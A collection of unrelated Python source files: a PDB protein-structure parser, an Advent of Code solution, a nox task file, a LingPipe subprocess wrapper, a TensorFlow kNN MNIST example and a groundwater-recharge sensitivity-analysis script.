if (set(tokens).union(all_recognized_dna) == all_recognized_dna):# or (len(set_of_tokens) <= 5 and len(set_of_tokens.union(dna_nucleotides)) == len(set_of_tokens) + 1): # allow one unknown DNA residue
chain_type = 'DNA'
elif (set(tokens).union(all_recognized_rna) == all_recognized_rna):# or (len(set_of_tokens) <= 5 and len(set_of_tokens.union(dna_nucleotides)) == len(set_of_tokens) + 1): # allow one unknown DNA residue
chain_type = 'RNA'
else:
assert(len(set(tokens).intersection(dna_nucleotides)) == 0)
assert(len(set(tokens).intersection(rna_nucleotides)) == 0)
chain_type = 'Protein'
if not self.chain_atoms.get(chain_id):
# possible for biological unit files
continue
if self.chain_atoms[chain_id] == set(['CA']):
chain_type = 'Protein skeleton'
# Get the sequence, mapping non-canonicals to the appropriate letter
self.chain_types[chain_id] = chain_type
sequence = []
if chain_type == 'DNA':
for r in tokens:
if dna_nucleotides_2to1_map.get(r):
sequence.append(dna_nucleotides_2to1_map[r])
else:
if non_canonical_dna.get(r):
sequence.append(non_canonical_dna[r])
else:
raise Exception("Unknown DNA residue %s." % r)
elif chain_type == 'RNA':
for r in tokens:
if r in rna_nucleotides:
sequence.append(r)
else:
if non_canonical_rna.get(r):
sequence.append(non_canonical_rna[r])
else:
raise Exception("Unknown RNA residue %s." % r)
else:
token_counter = 0
for r in tokens:
token_counter += 1
if residue_type_3to1_map.get(r):
sequence.append(residue_type_3to1_map[r])
else:
if self.modified_residue_mapping_3.get(r):
sequence.append(residue_type_3to1_map[self.modified_residue_mapping_3.get(r)])
elif non_canonical_amino_acids.get(r):
#print('Mapping non-canonical residue %s to %s.' % (r, non_canonical_amino_acids[r]))
#print(SEQRES_lines)
#print(line)
sequence.append(non_canonical_amino_acids[r])
elif r == 'UNK':
continue
# Skip these residues
elif r == 'ACE' and token_counter == 1:
# Always allow ACE as the first residue of a chain
sequence.append('X')
# End of skipped residues
else:
#print(modified_residue_mapping_3)
if modified_residue_mapping_3.get(r):
if modified_residue_mapping_3[r] == 'UNK':
sequence.append('X')
else:
assert(modified_residue_mapping_3[r] in residue_types_3)
sequence.append(residue_type_3to1_map[modified_residue_mapping_3[r]])
else:
raise Exception("Unknown protein residue %s in chain %s." % (r, chain_id))
sequences[chain_id] = "".join(sequence)
self.seqres_chain_order = seqres_chain_order
# Create Sequence objects for the SEQRES sequences
for chain_id, sequence in sequences.iteritems():
self.seqres_sequences[chain_id] = Sequence.from_sequence(chain_id, sequence, self.chain_types[chain_id])
def _get_ATOM_sequences(self):
'''Creates the ATOM Sequences.'''
# Get a list of all residues with ATOM or HETATM records
atom_sequences = {}
structural_residue_IDs_set = set() # use a set for a quicker lookup
ignore_HETATMs = True # todo: fix this if we need to deal with HETATMs
residue_lines_by_chain = []
structural_residue_IDs_set = []
model_index = 0
residue_lines_by_chain.append([])
structural_residue_IDs_set.append(set())
full_code_map = {}
for l in self.structure_lines:
if l.startswith("TER "):
model_index += 1
residue_lines_by_chain.append([])
structural_residue_IDs_set.append(set())
else:
residue_id = l[21:27]
if residue_id not in structural_residue_IDs_set[model_index]:
residue_lines_by_chain[model_index].append(l)
structural_residue_IDs_set[model_index].add(residue_id)
full_code_map[l[21]] = full_code_map.get(l[21], set())
full_code_map[l[21]].add(l[17:20].strip())
# Get the residues used by the residue lines. These can be used to determine the chain type if the header is missing.
for chain_id in self.atom_chain_order:
if full_code_map.get(chain_id):
# The chains may contain other molecules e.g. MG or HOH so before we decide their type based on residue types alone,
# we subtract out those non-canonicals
canonical_molecules = full_code_map[chain_id].intersection(dna_nucleotides.union(rna_nucleotides).union(residue_types_3))
if canonical_molecules.union(dna_nucleotides) == dna_nucleotides:
self.chain_types[chain_id] = 'DNA'
elif canonical_molecules.union(rna_nucleotides) == rna_nucleotides:
self.chain_types[chain_id] = 'RNA'
else:
self.chain_types[chain_id] = 'Protein'
line_types_by_chain = []
chain_ids = []
for model_index in range(len(residue_lines_by_chain)):
line_types = set()
if residue_lines_by_chain[model_index]:
chain_ids.append(residue_lines_by_chain[model_index][0][21])
for l in residue_lines_by_chain[model_index]:
line_types.add(l[0:6])
if line_types == set(['ATOM']):
line_types_by_chain.append('ATOM')
elif line_types == set(['HETATM']):
line_types_by_chain.append('HETATM')
else:
line_types_by_chain.append('Mixed')
for x in range(0, len(residue_lines_by_chain)):
residue_lines = residue_lines_by_chain[x]
line_types = line_types_by_chain[x]
if ignore_HETATMs and line_types == 'HETATM':
continue
for y in range(len(residue_lines)):
l = residue_lines[y]
residue_type = l[17:20].strip()
if l.startswith("HETATM"):
if self.modified_residue_mapping_3.get(residue_type):
residue_type = self.modified_residue_mapping_3[residue_type]
elif y == (len(residue_lines) - 1):
# last residue in the chain
if residue_type == 'NH2':
residue_type = 'UNK' # fixes a few cases e.g. 1MBG, 1K9Q, 1KA6
elif ignore_HETATMs:
continue
elif ignore_HETATMs:
continue
residue_id = l[21:27]
chain_id = l[21]
if chain_id in self.chain_types:
# This means the pdb had SEQRES and we constructed atom_sequences
chain_type = self.chain_types[chain_id]
else:
# Otherwise assume this is protein
chain_type = 'Protein'
atom_sequences[chain_id] = atom_sequences.get(chain_id, Sequence(chain_type))
residue_type = self.modified_residue_mapping_3.get(residue_type, residue_type)
short_residue_type = None
if residue_type == 'UNK':
short_residue_type = 'X'
elif chain_type == 'Protein' or chain_type == 'Protein skeleton':
short_residue_type = residue_type_3to1_map.get(residue_type) or protonated_residue_type_3to1_map.get(residue_type) or non_canonical_amino_acids.get(residue_type)
elif chain_type == 'DNA':
short_residue_type = dna_nucleotides_2to1_map.get(residue_type) or non_canonical_dna.get(residue_type)
elif chain_type == 'RNA':
short_residue_type = non_canonical_rna.get(residue_type) or residue_type
if not short_residue_type:
if l.startswith("ATOM") and l[12:16] == ' OH2' and l[17:20] == 'TIP':
continue
elif not self.strict:
short_residue_type = 'X'
else:
raise NonCanonicalResidueException("Unrecognized residue type %s in PDB file '%s', residue ID '%s'." % (residue_type, str(self.pdb_id), str(residue_id)))
#structural_residue_IDs.append((residue_id, short_residue_type))
# KAB - way to allow for multiresidue noncanonical AA's
if len(short_residue_type) == 1:
atom_sequences[chain_id].add(PDBResidue(residue_id[0], residue_id[1:], short_residue_type, chain_type))
else:
for char in short_residue_type:
atom_sequences[chain_id].add(PDBResidue(residue_id[0], residue_id[1:], char, chain_type))
self.atom_sequences = atom_sequences
def _get_ATOM_sequences_2(self):
'''Creates the ATOM Sequences.'''
# Get a list of all residues with ATOM or HETATM records
atom_sequences = {}
structural_residue_IDs_set = set() # use a set for a quicker lookup
ignore_HETATMs = True # todo: fix this if we need to deal with HETATMs
for l in self.structure_lines:
residue_type = l[17:20].strip()
if l.startswith("HETATM"):
if self.modified_residue_mapping_3.get(residue_type):
residue_type = self.modified_residue_mapping_3[residue_type]
elif ignore_HETATMs:
continue
residue_id = l[21:27]
if residue_id not in structural_residue_IDs_set:
chain_id = l[21]
chain_type = self.chain_types[chain_id]
atom_sequences[chain_id] = atom_sequences.get(chain_id, Sequence(chain_type))
residue_type = l[17:20].strip()
residue_type = self.modified_residue_mapping_3.get(residue_type, residue_type)
short_residue_type = None
if residue_type == 'UNK':
short_residue_type = 'X'
elif chain_type == 'Protein' or chain_type == 'Protein skeleton':
short_residue_type = residue_type_3to1_map.get(residue_type) or protonated_residue_type_3to1_map.get(residue_type)
elif chain_type == 'DNA':
short_residue_type = dna_nucleotides_2to1_map.get(residue_type) or non_canonical_dna.get(residue_type)
elif chain_type == 'RNA':
short_residue_type = non_canonical_rna.get(residue_type) or residue_type
elif not self.strict:
short_residue_type = 'X'
else:
raise NonCanonicalResidueException("Unrecognized residue type %s in PDB file '%s', residue ID '%s'." % (residue_type, str(self.pdb_id), str(residue_id)))
#structural_residue_IDs.append((residue_id, short_residue_type))
atom_sequences[chain_id].add(PDBResidue(residue_id[0], residue_id[1:], short_residue_type, chain_type))
structural_residue_IDs_set.add(residue_id)
self.atom_sequences = atom_sequences
def construct_pdb_to_rosetta_residue_map(self, rosetta_scripts_path, rosetta_database_path, extra_command_flags = None):
''' Uses the features database to create a mapping from Rosetta-numbered residues to PDB ATOM residues.
Next, the object's rosetta_sequences (a dict of Sequences) element is created.
Finally, a SequenceMap object is created mapping the Rosetta Sequences to the ATOM Sequences.
The extra_command_flags parameter expects a string e.g. "-ignore_zero_occupancy false".
'''
## Create a mapping from Rosetta-numbered residues to PDB ATOM residues
from map_pdb_residues import get_pdb_contents_to_pose_residue_map
# Apply any PDB-specific hacks
specific_flag_hacks = None
skeletal_chains = sorted([k for k in self.chain_types.keys() if self.chain_types[k] == 'Protein skeleton'])
if skeletal_chains:
raise PDBMissingMainchainAtomsException('The PDB to Rosetta residue map could not be created as chains %s only have CA atoms present.' % ", ".join(skeletal_chains))
# Get the residue mapping using the features database
pdb_file_contents = "\n".join(self.structure_lines)
success, mapping = get_pdb_contents_to_pose_residue_map(pdb_file_contents, rosetta_scripts_path, rosetta_database_path, pdb_id = self.pdb_id, extra_flags = ((specific_flag_hacks or '') + ' ' + (extra_command_flags or '')).strip())
if not success:
raise Exception("An error occurred mapping the PDB ATOM residue IDs to the Rosetta numbering.\n%s" % "\n".join(mapping))
## Create Sequences for the Rosetta residues (self.rosetta_sequences)
# Initialize maps
rosetta_residues = {}
rosetta_sequences = {}
for chain_id in self.atom_chain_order:
chain_type = self.chain_types[chain_id]
rosetta_residues[chain_id] = {}
rosetta_sequences[chain_id] = Sequence(chain_type)
# Create a map rosetta_residues, Chain -> Rosetta residue ID -> Rosetta residue information
rosetta_pdb_mappings = {}
for chain_id in self.atom_chain_order:
rosetta_pdb_mappings[chain_id] = {}
for k, v in mapping.iteritems():
rosetta_residues[k[0]][v['pose_residue_id']] = v
rosetta_pdb_mappings[k[0]][v['pose_residue_id']] = k
# Create rosetta_sequences map Chain -> Sequence(Residue)
for chain_id, v in sorted(rosetta_residues.iteritems()):
chain_type = self.chain_types[chain_id]
for rosetta_id, residue_info in sorted(v.iteritems()):
short_residue_type = None
if chain_type == 'Protein':
residue_type = residue_info['name3'].strip()
short_residue_type = residue_type_3to1_map[residue_type]
else:
assert(chain_type == 'DNA' or chain_type == 'RNA')
residue_type = residue_info['res_type'].strip()
if residue_type.find('UpperDNA') != -1 or residue_type.find('LowerDNA') != -1:
residue_type = residue_type[:3]
short_residue_type = dna_nucleotides_3to1_map.get(residue_type) # Commenting this out since Rosetta does not seem to handle these "or non_canonical_dna.get(residue_type)"
assert(short_residue_type)
rosetta_sequences[chain_id].add(Residue(chain_id, rosetta_id, short_residue_type, chain_type))
## Create SequenceMap objects to map the Rosetta Sequences to the ATOM Sequences
rosetta_to_atom_sequence_maps = {}
for chain_id, rosetta_pdb_mapping in rosetta_pdb_mappings.iteritems():
rosetta_to_atom_sequence_maps[chain_id] = SequenceMap.from_dict(rosetta_pdb_mapping)
self.rosetta_to_atom_sequence_maps = rosetta_to_atom_sequence_maps
self.rosetta_sequences = rosetta_sequences
def get_atom_sequence_to_rosetta_map(self):
'''Uses the Rosetta->ATOM injective map to construct an injective mapping from ATOM->Rosetta.
We do not extend the injection to include ATOM residues which have no corresponding Rosetta residue.
e.g. atom_sequence_to_rosetta_mapping[c].map.get('A 45 ') will return None if there is no corresponding Rosetta residue
those residues to None.
Likewise, if a PDB chain c is not present in the Rosetta model then atom_sequence_to_rosetta_mapping[c].map.get(s) returns None.
'''
if not self.rosetta_to_atom_sequence_maps and self.rosetta_sequences:
raise Exception('The PDB to Rosetta mapping has not been determined. Please call construct_pdb_to_rosetta_residue_map first.')
atom_sequence_to_rosetta_mapping = {}
for chain_id, mapping in self.rosetta_to_atom_sequence_maps.iteritems():
chain_mapping = {}
for k in mapping:
chain_mapping[k[1]] = k[0]
atom_sequence_to_rosetta_mapping[chain_id] = SequenceMap.from_dict(chain_mapping)
# Add empty maps for missing chains
for chain_id, sequence in self.atom_sequences.iteritems():
if not atom_sequence_to_rosetta_mapping.get(chain_id):
atom_sequence_to_rosetta_mapping[chain_id] = SequenceMap()
return atom_sequence_to_rosetta_mapping
def get_atom_sequence_to_rosetta_json_map(self):
'''Returns the mapping from PDB ATOM residue IDs to Rosetta residue IDs in JSON format.'''
import json
d = {}
atom_sequence_to_rosetta_mapping = self.get_atom_sequence_to_rosetta_map()
for c, sm in atom_sequence_to_rosetta_mapping.iteritems():
for k, v in sm.map.iteritems():
d[k] = v
return json.dumps(d, sort_keys = True)
def get_rosetta_sequence_to_atom_json_map(self):
'''Returns the mapping from Rosetta residue IDs to PDB ATOM residue IDs in JSON format.'''
import json
if not self.rosetta_to_atom_sequence_maps and self.rosetta_sequences:
raise Exception('The PDB to Rosetta mapping has not been determined. Please call construct_pdb_to_rosetta_residue_map first.')
d = {}
for c, sm in self.rosetta_to_atom_sequence_maps.iteritems():
for k, v in sm.map.iteritems():
d[k] = v
#d[c] = sm.map
return json.dumps(d, sort_keys = True)
def map_pdb_residues_to_rosetta_residues(self, mutations):
'''This function takes a list of ChainMutation objects and uses the PDB to Rosetta mapping to return the corresponding
list of SimpleMutation objects using Rosetta numbering.
e.g.
p = PDB(...)
p.construct_pdb_to_rosetta_residue_map()
rosetta_mutations = p.map_pdb_residues_to_rosetta_residues(pdb_mutations)
'''
if not self.rosetta_to_atom_sequence_maps and self.rosetta_sequences:
raise Exception('The PDB to Rosetta mapping has not been determined. Please call construct_pdb_to_rosetta_residue_map first.')
rosetta_mutations = []
atom_sequence_to_rosetta_mapping = self.get_atom_sequence_to_rosetta_map()
for m in mutations:
rosetta_residue_id = atom_sequence_to_rosetta_mapping[m.Chain].get('%s%s' % (m.Chain, m.ResidueID))
rosetta_mutations.append(SimpleMutation(m.WildTypeAA, rosetta_residue_id, m.MutantAA))
return rosetta_mutations
def assert_wildtype_matches(self, mutation):
'''Check that the wildtype of the Mutation object matches the PDB sequence.'''
readwt = self.getAminoAcid(self.getAtomLine(mutation.Chain, mutation.ResidueID))
assert(mutation.WildTypeAA == residue_type_3to1_map[readwt])
### END OF REFACTORED CODE
@staticmethod
def ChainResidueID2String(chain, residueID):
'''Takes a chain ID e.g. 'A' and a residueID e.g. '123' or '123A' and returns the 6-character identifier spaced as in the PDB format.'''
return "%s%s" % (chain, PDB.ResidueID2String(residueID))
@staticmethod
def ResidueID2String(residueID):
'''Takes a residueID e.g. '123' or '123A' and returns the 5-character identifier spaced as in the PDB format.'''
if residueID.isdigit():
return "%s " % (residueID.rjust(4))
else:
return "%s" % (residueID.rjust(5))
def validate_mutations(self, mutations):
'''This function has been refactored to use the SimpleMutation class.
The parameter is a list of Mutation objects. The function has no return value but raises a PDBValidationException
if the wildtype in the Mutation m does not match the residue type corresponding to residue m.ResidueID in the PDB file.
'''
# Chain, ResidueID, WildTypeAA, MutantAA
resID2AA = self.get_residue_id_to_type_map()
badmutations = []
for m in mutations:
wildtype = resID2AA.get(PDB.ChainResidueID2String(m.Chain, m.ResidueID), "")
if m.WildTypeAA != wildtype:
badmutations.append(m)
if badmutations:
raise PDBValidationException("The mutation(s) %s could not be matched against the PDB %s." % (", ".join(map(str, badmutations)), self.pdb_id))
def getAminoAcid(self, line):
return line[17:20]
def getAtomLine(self, chain, resid):
'''This function assumes that all lines are ATOM or HETATM lines.
resid should have the proper PDB format i.e. an integer left-padded
to length 4 followed by the insertion code which may be a blank space.'''
for line in self.lines:
fieldtype = line[0:6].strip()
assert(fieldtype == "ATOM" or fieldtype == "HETATM")
if line[21:22] == chain and resid == line[22:27]:
return line
raise Exception("Could not find the ATOM/HETATM line corresponding to chain '%(chain)s' and residue '%(resid)s'." % vars())
def CheckForPresenceOf(self, reslist):
'''This checks whether residues in reslist exist in the ATOM lines.
It returns a list of the residues in reslist which did exist.'''
if type(reslist) == type(""):
reslist = [reslist]
foundRes = {}
for line in self.lines:
resname = line[17:20]
if line[0:4] == "ATOM":
if resname in reslist:
foundRes[resname] = True
return foundRes.keys()
def get_residue_id_to_type_map(self):
'''Returns a dictionary mapping 6-character residue IDs (Chain, residue number, insertion code e.g. "A 123B") to the
corresponding one-letter amino acid.
Caveat: This function ignores occupancy - this function should be called once occupancy has been dealt with appropriately.'''
resid2type = {}
atomlines = self.parsed_lines['ATOM ']
for line in atomlines:
resname = line[17:20]
if resname in allowed_PDB_residues_types and line[13:16] == 'CA ':
resid2type[line[21:27]] = residue_type_3to1_map.get(resname) or protonated_residue_type_3to1_map.get(resname)
return resid2type
def chain_ids(self):
chain_ids = set()
chainlist = []
for line in self.lines:
if line[0:4] == "ATOM" and line[17:20] in allowed_PDB_residues_types and line[26] == ' ':
chain = line[21:22]
if chain not in chain_ids:
chain_ids.add(chain)
chainlist.append(chain)
return chainlist
|
StarcoderdataPython
|
8037223
|
horizontal = 0
depth = 0
aim = 0
instructions = []
with open("Day02.txt", "r") as f:
data = f.read()
data = data.splitlines()
for i in data:
instructions.append(i.split(" "))
for i in instructions:
i[1] = int(i[1])
def part1(depth, horizontal):
for items in instructions:
if items[0] == "up":
depth -= items[1]
elif items[0] == "down":
depth += items[1]
elif items[0] == "forward":
horizontal += items[1]
print(horizontal*depth)
def part2(depth, horizontal, aim):
for items in instructions:
if items[0] == "up":
aim -= items[1]
elif items[0] == "down":
aim += items[1]
elif items[0] == "forward":
horizontal += items[1]
depth += aim*items[1]
print(horizontal*depth)
part1(depth, horizontal)
part2(depth, horizontal, aim)
|
StarcoderdataPython
|
11358353
|
<reponame>inhumantsar/fr2ics
from os.path import abspath
import os
import sys
import webbrowser
import nox
try:
from urllib import pathname2url
except:
from urllib.request import pathname2url
def _browser(path):
webbrowser.open("file://" + pathname2url(abspath(path)))
@nox.session(reuse_venv=True, python=['3.6', '3.7'])
def test(session):
"""Runs pytest"""
with open('requirements_dev.txt', 'r') as reqs_file:
reqs = reqs_file.readlines()
session.install(*reqs)
session.run('pip', 'list')
session.run('pytest')
@nox.session(reuse_venv=True)
def check_coverage(session):
"""Checks tests for total coverage. Outputs to stdout and htmlcov/"""
with open('requirements_dev.txt', 'r') as reqs_file:
reqs = reqs_file.readlines()
session.install(*reqs)
for cmd in [
['coverage', 'run', '--source', 'fr2ics', '-m', 'pytest'],
['coverage', 'report', '-m'],
['coverage', 'html']
]:
session.run(*cmd)
_browser('htmlcov/index.html')
@nox.session(reuse_venv=True)
def lint(session):
"""Checks the project with pylint"""
session.install('pylint')
session.run('pylint')
@nox.session(reuse_venv=True)
def build_docs(session):
"""Builds documentation using Sphinx. Outputs to docs/, will open browser."""
session.install('Sphinx')
# clean up a bit first
for del_file in ['docs/fr2ics.rst',
'docs/modules.rst']:
try:
os.remove(del_file)
except FileNotFoundError as fnfe:
pass
# build docs
session.run('sphinx-apidoc', '-o', 'docs/', 'fr2ics')
# TODO: upload to S3? readthedocs? github pages?
_browser('docs/')
@nox.session(reuse_venv=True)
def build_sdist(session):
"""Builds Source Distribution package. Outputs to dist/"""
session.run('python3', 'setup.py', 'sdist')
assert os.path.exists('dist/')
|
StarcoderdataPython
|
11359575
|
<filename>text_extraction/lingpipe.py<gh_stars>1-10
import subprocess
#import xml.dom.minidom
import time
class LingPipe:
path = ''
def __init__(self, pathToLingPipe):
self.path = pathToLingPipe
self.process = subprocess.Popen([self.path],stdout=subprocess.PIPE,stdin=subprocess.PIPE)
def parse(self, text):
results = list()
text = text.strip()
if len(text) == 0:
return results
#print text
#print str(self.process)
for oneline in text.split('\n'):
self.process.stdin.write(oneline+'\n')
#print oneline
while True:
#print "HERE"
r = self.process.stdout.readline()[:-1]
#print r
if not r:
# Waiting for a blank line
break
results.append(r)
return results
def __del__(self):
self.process.stdin.close()
slippage = False
for line in self.process.stdout:
print "UNEXPECTED DATA:", line.strip()
slippage = True
if slippage:
raise Exception('Lingpipe slippage occurred. Receiving additional Lingpipe data when none expected')
|
StarcoderdataPython
|
3384442
|
<reponame>OsbornHu/tensorflow-ml
#!/usr/bin/python2.7
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2018/12/8 下午1:52
# 5.6 用TensorFlow实现图像识别
# 1. 导入必要的编程库
import random
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
from tensorflow.examples.tutorials.mnist import input_data
# 2. 创建一个计算图会话,加载MNIST手写数字数据集,并指定one-hot编码
sess = tf.Session()
mnist = input_data.read_data_sets('MNIST_data/', one_hot=True)
"""
one-hot编码是分类类别的数值化,这样更有利于后续的数值计算。本例包含10个类别(数字0到9),采用长度为10的0-1向量表示。例如,类别"0"表示为向量:1,0,0,0,0,0,0,0,0,类别"1"表示向量:0,1,0,0,0,0,0,0,0,等等。
"""
# 3. 由于MINIST手写数字数据集较大,直接计算成千上万个输入的784个特征之间的距离是比较困难的,所以本例会抽样成小数据集进行训练
train_size = 1000
test_size = 102
rand_train_indices = np.random.choice(len(mnist.train.images), train_size, replace=False)
rand_test_indices = np.random.choice(len(mnist.test.images), test_size, replace=False)
x_vals_train = mnist.train.images[rand_train_indices]
x_vals_test = mnist.test.images[rand_test_indices]
y_vals_train = mnist.train.labels[rand_train_indices]
y_vals_test = mnist.test.labels[rand_test_indices]
# 4. 声明k值和批量的大小
k = 4
batch_size = 6
# 5. 现在在计算图中开始初始化占位符,并赋值
x_data_train = tf.placeholder(shape=[None, 784], dtype=tf.float32)
x_data_test = tf.placeholder(shape=[None, 784], dtype=tf.float32)
y_target_train = tf.placeholder(shape=[None, 10], dtype=tf.float32)
y_target_test = tf.placeholder(shape=[None, 10], dtype=tf.float32)
# 6. 声明距离度量函数。本例使用L1范数(即绝对值)作为距离函数
distance = tf.reduce_sum(tf.abs(tf.subtract(x_data_train, tf.expand_dims(x_data_test, 1))), reduction_indices=2)
"""
注意,我们可以把距离函数定义为L2范数。对应的代码为:
distance = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(x_data_train, tf.expand_dims(x_data_test, 1))), reduction_indices = 1))。
"""
# 7. 找到最接近的top k图片和预测模型。在数据集的one-hot编码索引上进行预测模型计算,然后统计发生的数量
top_k_xvals, top_k_indices = tf.nn.top_k(tf.negative(distance), k=k)
prediction_indices = tf.gather(y_target_train, top_k_indices)
count_of_predictions = tf.reduce_sum(prediction_indices, dimension=1)
prediction = tf.argmax(count_of_predictions, dimension=1)
# 8. 在测试集上遍历迭代运行,计算预测值,并将结果存储
num_loops = int(np.ceil(len(x_vals_test)/batch_size))
test_output = []
actual_vals = []
for i in range(num_loops):
min_index = i*batch_size
max_index = min((i+1)*batch_size, len(x_vals_train))
x_batch = x_vals_test[min_index:max_index]
y_batch = y_vals_test[min_index:max_index]
predictions = sess.run(prediction, feed_dict={x_data_train: x_vals_train, x_data_test: x_batch, y_target_train: y_vals_train, y_target_test: y_batch})
# 9. 现在已经保存了实际值和预测返回值,下面计算模型训练准确度。不过该结果会因为测试数据集和训练数据集的随机抽样而变化,但是其准确度约为80%~90%
accuracy = sum([1./test_size for i in range(test_size) if test_output[i] == actual_vals[i]])
print('Accuracy on test set:' + str(accuracy))
# Accyract ib test set: 0.8333333333333325
# 10. 绘制最后批次的计算结果
actuals = np.argmax(y_batch, axis=1)
Nrows = 2
Ncols = 3
for i in range(len(actuals)):
plt.subplot(Nrows, Ncols, i+1)
plt.imshow(np.reshape(x_batch[i], [28,28]), cmap='Greys_r')
plt.title('Actual: ' + str(actuals[i]) + ' Pred: ' + str(predictions[i]), fontsize=10)
frame = plt.gca()
frame.axes.get_xaxis().set_visible(False)
frame.axes.get_yaxis().set_visible(False)
|
StarcoderdataPython
|
6564934
|
<filename>zobs/orecharge/Point_Analysis/ETRM_Point_SAUA_spider_only.py<gh_stars>1-10
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
from datetime import datetime
import matplotlib.pyplot as plt
from matplotlib import rc
from osgeo import ogr
import etrm_daily_SA_2MAY16
import extract_readIn
import numpy as np
import pandas
rc('mathtext', default='regular')
save_path = 'C:\\Users\\David\\Documents\\ArcGIS\\results\\Sensitivity_analysis\\data'
pandas.set_option('display.max_rows', 3000)
pandas.set_option('display.max_columns', 3000)
pandas.set_option('display.width', 10000)
pandas.set_option('display.precision', 3)
pandas.options.display.float_format = '${:,.2f}'.format
np.set_printoptions(threshold=3000, edgeitems=5000, precision=3)
pandas.set_option('display.height', 5000)
pandas.set_option('display.max_rows', 5000)
startTime = datetime.now()
print(startTime)
def print_full(x):
pandas.set_option('display.max_rows', len(x))
print(x)
pandas.reset_option('display.max_rows')
print (x)
def round_to_value(number, roundto):
return round(number / roundto) * roundto
def dfv(begin_ind, end_ind):
return df.iloc[begin_ind, end_ind]
def save_df(df, save_path):
df.to_csv('{}\\data1.csv'.format(save_path), sep=',')
np.set_printoptions(linewidth=700, precision=2, threshold=2500)
# Set start datetime object
start, end = datetime(2000, 1, 1), datetime(2013, 12, 31)
# Define winter and summer for SNOW algorithm
sWin, eWin = datetime(start.year, 11, 1), datetime(end.year, 3, 30)
# Define monsoon for Ksat, presumed storm intensity
sMon, eMon = datetime(start.year, 6, 1), datetime(start.year, 10, 1)
temps = range(-5, 6)
all_pct = [x * 0.1 for x in range(5, 16)]
ndvi_range = np.linspace(0.9, 1.7, 11)
ndvi_range = np.array([round_to_value(x, 0.05) for x in ndvi_range])
var_arrs = []
y = 0
for x in range(0, 6):
ones = np.ones((5, 11), dtype=float)
zeros = [x * 0.0 for x in range(5, 16)]
norm_ndvi = np.array([1.25 for x in zeros])
if y == 0:
arr = np.insert(ones, y, temps, axis=0)
arr = np.insert(arr, 4, norm_ndvi, axis=0)
arr = arr[0:6]
var_arrs.append(arr)
arr = []
elif y == 4:
arr = np.insert(ones, 0, zeros, axis=0)
arr = np.insert(arr, y, ndvi_range, axis=0)
arr = arr[0:6]
var_arrs.append(arr)
arr = []
elif y == 5:
arr = np.insert(ones, 0, zeros, axis=0)
arr = np.insert(arr, 4, norm_ndvi, axis=0)
arr = arr[0:5]
arr = np.insert(arr, y, all_pct, axis=0)
var_arrs.append(arr)
arr = []
else:
arr = np.insert(ones, 0, zeros, axis=0)
arr = np.insert(arr, y, all_pct, axis=0)
arr = np.insert(arr, 4, norm_ndvi, axis=0)
arr = arr[0:6]
var_arrs.append(arr)
arr = []
y += 1
factors = ['Temperature', 'Precipitation', 'Reference ET', 'Total Water Storage (TAW)',
'Vegetation Density (NDVI)', 'Soil Evaporation Depth']
normalize_list = [2, 0.20, 0.20, 2, 0.20, 0.50]
normalize_list = [1 for x in range(0, len(normalize_list) + 1)]
site_list = ['Bateman', 'Navajo_Whiskey_Ck', 'Quemazon', 'Sierra_Blanca', 'SB_1', 'SB_2', 'SB_4', 'SB_5', 'VC_1',
'VC_2', 'VC_3', 'CH_1', 'CH_3', 'MG_1', 'MG_2', 'WHLR_PK', 'LP', 'South_Baldy',
'Water_Canyon', 'La_Jencia', 'Socorro']
df = pandas.DataFrame(columns=factors, index=site_list)
df_norm = pandas.DataFrame(columns=factors, index=site_list)
yy = 0
for var_arr in var_arrs:
factor = factors[yy]
print(factor)
print('')
shp_filename = 'C:\\Recharge_GIS\\qgis_layers\\sensitivity_points\\SA_pnts29APR16_UTM.shp'
ds = ogr.Open(shp_filename)
lyr = ds.GetLayer()
defs = lyr.GetLayerDefn()
for feat in lyr:
name = feat.GetField("Name")
name = name.replace(' ', '_')
geom = feat.GetGeometryRef()
mx, my = geom.GetX(), geom.GetY()
path = 'C:\Users\David\Documents\Recharge\Sensitivity_analysis\SA_extracts'
file_name = '{}\\{}_extract.csv'.format(path, name)
print(file_name)
extract_data = extract_readIn.read_std_extract_csv(file_name)
rslts = []
for col in var_arr.T:
pt_data, tot_data, mass_data = etrm_daily_SA_2MAY16.run_daily_etrm(start, end, extract_data,
sMon, eMon, col)
rech = np.sum(pt_data[:, 9])
rslts.append(rech)
df.iloc[site_list.index(name), factors.index(factor)] = np.divide(np.array(rslts), 14.0)
# tot_data : precip, et, tot_transp, tot_evap, infil, runoff, snow_fall, cum_mass, end_mass
yy += 1
# "SI = [Q(Po + delP] -Q(Po - delP] / (2 * delP)"
# where SI = Sensitivity Index, Q = etrm, Po = base value of input parameter, delP = change in value of input var
# find sensitivity index
xx = 0
for param in df.iteritems():
data_cube = param[1]
var_arr = var_arrs[xx]
yy = 0
for site in data_cube:
print(site)
site_name = site_list[yy]
normal = normalize_list[xx]
site_obj = [x for x in site]
sens_list = []
zz = 0
for var in var_arr[xx]:
if var != var_arr[xx][5]:
base = var_arr[xx][5]
deltaP = var - base
obj = site_obj[zz]
sen = ((obj * (base + deltaP) - obj * (base - deltaP)) / (2 * deltaP)) * normal
sens_list.append(sen)
zz += 1
else:
sens_list.append(site_obj[zz])
zz += 1
sens_list = np.array(sens_list)
df_norm.iloc[site_list.index(site_name), factors.index(param[0])] = sens_list
if yy == 20:
print('done')
break
yy += 1
xx += 1
fig_path = 'C:\\Users\\David\\Documents\\ArcGIS\\results\\Sensitivity_analysis\\normalized'
disp_pct = [(int(x)) for x in np.add(np.multiply(all_pct, 100.0), -100)]
# disp_pct.remove(0)
temps = range(-5, 6)
# temps.remove(0)
all_pct = [x * 0.1 for x in range(5, 16)]
# all_pct.remove(1.0)
ndvi_range = np.linspace(0.9, 1.7, 11)
ndvi_range = [round_to_value(x, 0.05) for x in ndvi_range]
# ndvi_range.remove(1.3)
ndvi_range = np.array(ndvi_range)
for index, row in df_norm.iterrows():
if row.name == 'La_Jencia': # ['South_Baldy', 'Water_Canyon', 'La_Jencia', 'Socorro']:
print(index, row)
